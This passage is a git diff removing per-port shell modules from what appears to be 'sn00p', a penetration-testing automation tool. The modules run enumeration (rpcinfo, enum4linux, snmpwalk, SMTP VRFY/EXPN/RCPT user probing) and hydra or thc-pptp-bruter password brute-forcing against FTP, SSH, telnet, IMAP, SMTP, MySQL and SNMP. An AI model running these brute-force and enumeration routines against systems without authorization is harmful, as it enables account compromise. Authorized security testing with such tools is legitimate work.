(${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get remote rpc services via rpcinfo -# TOOLS: rpcinfo -do_rpcinfo() -{ - opts="-p" - - rpcinfo ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get logged in users over rusersd via rusers -# TOOLS: rusers -do_rusers() -{ - opts="-l" - - rusers ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/113.sh b/automation/sn00p/source/src/modules/tcp/113.sh deleted file mode 100644 index 45671b4..0000000 --- a/automation/sn00p/source/src/modules/tcp/113.sh +++ /dev/null @@ -1,145 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get version of identd via netcat -# TOOLS: nc -do_ident_version() -{ - echo "version" | nc -vv -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# try to get onwer of running proccess via nmap ident scan -# TOOLS: nmap -do_ident_scan() -{ - opts="-n -I -PN" - - nmap ${opts} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/135.sh b/automation/sn00p/source/src/modules/tcp/135.sh deleted file mode 100644 index d12dfe2..0000000 --- a/automation/sn00p/source/src/modules/tcp/135.sh +++ /dev/null @@ -1,133 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "135/TCP" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/139.sh b/automation/sn00p/source/src/modules/tcp/139.sh deleted file mode 100644 index 592d6c0..0000000 --- a/automation/sn00p/source/src/modules/tcp/139.sh +++ /dev/null @@ -1,179 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# audit netbios via nbaudit -# TOOLS: nbaudit -do_nbaudit() -{ - nbaudit ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nbtscan -# TOOLS: nbtscan -do_nbtscan() -{ - opts="-v -r" - - nbtscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nmbscan -# TOOLS: nmbscan -do_nmbscan() -{ - opts="-h" - - nmbscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "139/SMB" 2>&1 - - return ${SUCCESS} -} - - -# try to get as much as possible via enum4linux -# TOOLS: enum4linux -do_enum4linux() -{ - opts="-a" - - enum4linux ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/143.sh b/automation/sn00p/source/src/modules/tcp/143.sh deleted file mode 100644 index c6fcedc..0000000 --- a/automation/sn00p/source/src/modules/tcp/143.sh +++ /dev/null @@ -1,141 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_imap() -{ - opts="-e nsr -f -v" - - for user in ${ULISTS} - do - for pass in ${PLISTS} - do - hydra ${opts} -L ${user} -P ${pass} imap://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/1521.sh b/automation/sn00p/source/src/modules/tcp/1521.sh deleted file mode 100644 index b58d19b..0000000 --- a/automation/sn00p/source/src/modules/tcp/1521.sh +++ /dev/null @@ -1,139 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: tnscmd -do_tnscmd10g() -{ - # <= 9 - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - echo - - # now for 10g - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/161.sh b/automation/sn00p/source/src/modules/tcp/161.sh deleted file mode 100644 index e8f18c0..0000000 --- a/automation/sn00p/source/src/modules/tcp/161.sh +++ /dev/null @@ -1,174 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos over version 1 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v1() -{ - opts="-v 1 -c public" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos over version 2 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v2() -{ - opts="-c public -v 2c" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos via onesixtyone -# TOOLS: onesixtyone -do_onesixtyone() -{ - opts="-d" - - onesixtyone ${opts} ${DHOST} "public" - - return ${SUCCESS} -} - - -# bruteforce via hydra -# TOOLS: hydra -do_hydra_snmp() -{ - opts="-e nsr -f -v" - - for pass in ${PLISTS} - do - hydra ${opts} -P ${pass} "snmp://${DHOST}" 2>&1 - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/1723.sh b/automation/sn00p/source/src/modules/tcp/1723.sh deleted file mode 100644 index 0089be4..0000000 --- a/automation/sn00p/source/src/modules/tcp/1723.sh +++ /dev/null @@ -1,139 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -# bruteforce logins via thc-pptp-bruter -# TOOLS: thc-pptp-bruter -do_thc_pptp_bruter() -{ - for ulist in ${ULISTS} - do - for user in `cat ${ulist}` - do - for plist in ${PLISTS} - do - thc-pptp-bruter -p ${DPORT} -u ${user} -w ${plist} 2>&1 - done - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/2049.sh b/automation/sn00p/source/src/modules/tcp/2049.sh deleted file mode 100644 index 3999ca4..0000000 --- a/automation/sn00p/source/src/modules/tcp/2049.sh +++ /dev/null @@ -1,147 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get exported shares / directories via showmount -# TOOLS: showmount -do_showmount() -{ - opts="-e" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: showmount -do_showmount_clients() -{ - opts="-a" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/21.sh b/automation/sn00p/source/src/modules/tcp/21.sh deleted file mode 100644 index 2d2a3cc..0000000 --- a/automation/sn00p/source/src/modules/tcp/21.sh +++ /dev/null @@ -1,162 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# anonymous login via netcat -# TOOLS: ncat -do_anon_login_ncat() -{ - echo -e "USER anonymous\r\nPASS ftp@ftp.net" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint via ftpmap -# TOOLS: ftpmap -do_ftpmap() -{ - ftpmap -P ${DPORT} -s ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_ftp() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} ftp://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/22.sh b/automation/sn00p/source/src/modules/tcp/22.sh deleted file mode 100644 index 58052f8..0000000 --- a/automation/sn00p/source/src/modules/tcp/22.sh +++ /dev/null @@ -1,153 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# verify SSH daemon and read banner -# TOOLS: nc -do_verify_ssh() -{ - opts="-vv -w 3" - - echo "SSH-2.0-OpenSSH" | nc ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_ssh() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} ssh://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/23.sh b/automation/sn00p/source/src/modules/tcp/23.sh deleted file mode 100644 index b5a1355..0000000 --- a/automation/sn00p/source/src/modules/tcp/23.sh +++ /dev/null @@ -1,141 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_telnet() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} telnet://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/2483.sh b/automation/sn00p/source/src/modules/tcp/2483.sh deleted file mode 100644 index 0abbff9..0000000 --- a/automation/sn00p/source/src/modules/tcp/2483.sh +++ /dev/null @@ -1,139 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: tnscmd -do_tnscmd10g() -{ - # <= 9 - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - echo - - # now for 10g - tnscmd ping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/25.sh b/automation/sn00p/source/src/modules/tcp/25.sh deleted file mode 100644 index d1ddb0e..0000000 --- a/automation/sn00p/source/src/modules/tcp/25.sh +++ /dev/null @@ -1,243 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# module globals -domain="`head -1 ../../host/default/domain.log 2> /dev/null`" -user1="root" -user2="sn00p" - - -# check if user enumeration is possible via VRFY using smtp-user-enum -# TOOLS: smtp-user-enum -do_vrfy_scan() -{ - opts1="-v -M VRFY -u root -f localhost" - opts2="-v -M VRFY -u root -f localhost -D ${domain}" - - if [ -z "${DPORT}" ] - then - DPORT="25" - fi - - # first try user guessing (without domain - smtp-user-enum ${opts1} -p ${DPORT} -t ${DHOST} 2>&1 - - # try email addr guessing - smtp-user-enum ${opts2} -p ${DPORT} -t ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# check for existing users via RCPT TO using smtp-user-enum -# TOOLS: smtp-user-enum -do_rcpt_scan() -{ - opts1="-v -M RCPT -u root -f localhost" - opts2="-v -M RCPT -u root -f localhost -D ${domain}" - - if [ -z "${DPORT}" ] - then - DPORT="25" - fi - - # first try user guessing (without domain - smtp-user-enum ${opts1} -p ${DPORT} -t ${DHOST} 2>&1 - - # try email addr guessing - smtp-user-enum ${opts2} -p ${DPORT} -t ${DHOST} 2>&1 - - - return ${SUCCESS} -} - - -# check for existing users via EXPN using smtp-user-enum -# TOOLS: smtp-user-enum -do_expn_scan() -{ - opts1="-v -M EXPN -u root -f localhost" - opts2="-v -M EXPN -u root -f localhost -D ${domain}" - - if [ -z "${DPORT}" ] - then - DPORT="25" - fi - - # first try user guessing (without domain - smtp-user-enum ${opts1} -p ${DPORT} -t ${DHOST} 2>&1 - - # try email addr guessing - smtp-user-enum ${opts2} -p ${DPORT} -t ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# check for open relay -# TOOLS: ncat -do_open_relay() -{ - ehlo="mail.google.com" - sender="" - reciever="" - - echo -e "ehlo ${ehlo}\r\nmail from: ${sender}\r\nrcpt to: ${reciever}\r\n"\ - "data\r\nfoobar\r\n." | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint server via smtpscan -# TOOLS: smtpscan -do_smtpscan() -{ - # smtpscan options - fprint_file="/usr/share/smtpscan/fingerprints" - test_file="/usr/share/smtpscan/tests" - - smtpscan -f ${fprint_file} -t ${test_file} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_smtp() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} smtp://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/3268.sh b/automation/sn00p/source/src/modules/tcp/3268.sh deleted file mode 100644 index d7610af..0000000 --- a/automation/sn00p/source/src/modules/tcp/3268.sh +++ /dev/null @@ -1,134 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# gather LDAP / AD information via ldapenum -do_ldapenum() -{ - opts="-U -G -E -v" - - ldapenum.pl ${opts} -i ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/32771.sh b/automation/sn00p/source/src/modules/tcp/32771.sh deleted file mode 100644 index 0636f31..0000000 --- a/automation/sn00p/source/src/modules/tcp/32771.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get remote rpc services via rpcinfo -# TOOLS: rpcinfo -do_rpcinfo() -{ - opts="-p" - - rpcinfo ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/3306.sh b/automation/sn00p/source/src/modules/tcp/3306.sh deleted file mode 100644 index c5fe288..0000000 --- a/automation/sn00p/source/src/modules/tcp/3306.sh +++ /dev/null @@ -1,141 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_mysql() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} mysql://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/389.sh b/automation/sn00p/source/src/modules/tcp/389.sh deleted file mode 100644 index 80655ff..0000000 --- a/automation/sn00p/source/src/modules/tcp/389.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} 